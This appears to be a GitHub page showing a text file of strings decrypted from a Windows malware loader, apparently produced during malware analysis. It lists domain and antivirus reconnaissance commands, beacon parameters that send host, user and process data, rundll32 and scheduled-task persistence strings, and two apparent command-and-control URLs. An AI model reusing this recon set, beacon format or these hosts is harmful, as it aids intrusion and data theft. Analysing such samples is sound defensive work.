-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdecrypted_data.txt
124 lines (122 loc) · 2.42 KB
/
decrypted_data.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
/c ipconfig /all
C:\Windows\System32\cmd.exe
/c systeminfo
C:\Windows\System32\cmd.exe
/c nltest /domain_trusts
C:\Windows\System32\cmd.exe
/c net view /all /domain
/c nltest /domain_trusts /all_trusts
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
/c net view /all
C:\Windows\System32\cmd.exe
&ipconfig=
/c net group "Domain Admins" /domain
C:\Windows\System32\cmd.exe
/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
C:\Windows\System32\wbem\wmic.exe
/c net config workstation
C:\Windows\System32\cmd.exe
/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
C:\Windows\System32\cmd.exe
/c whoami /groups
C:\Windows\System32\cmd.exe
&systeminfo=
&domain_trusts=
&domain_trusts_all=
&net_view_all_domain=
&net_view_all=
&net_group=
&wmic=
&net_config_ws=
&net_wmic_av=
&whoami_group=
{
"pid":
"%d",
"proc":
"%s",
"subproc": [
]
}
&proclist=[
{
"pid":
"%d",
"proc":
"%s",
"subproc": [
]
}
&desklinks=[
*.*
"%s"
]
Update_%x
Custom_update
.dll
.exe
Updater
"%s"
rundll32.exe
"%s", %s %s
runnung
:wtfbbq
%d
%s%s
files/bp.dat
%s\%d.dll
%d.dat
%s\%s
init -zzzz="%s\%s"
front
/files/
Facial
.exe
Content-Type: application/x-www-form-urlencoded
POST
GET
curl/7.88.1
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
CLEARURL
URLS
COMMAND
ERROR
eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
C:\WINDOWS\SYSTEM32\rundll32.exe %s
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
<html>
<!DOCTYPE
%s%d.dll
12345
&stiller=
%s%d.exe
LogonTrigger
%x%x
TimeTrigger
PT0H%02dM
%04d-%02d-%02dT%02d:%02d:%02d
&mac=
%02x
:%02x
PT0S
;
&computername=%s
&domain=%s
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
\*.dll
%04X%04X%04X%04X%08X%04X
%04X%04X%04X%04X%08X%04X
\Registry\Machine\
https://jarinamaers.shop/live/
https://wrankaget.site/live/
AppData
Desktop
Startup
Personal
Local AppData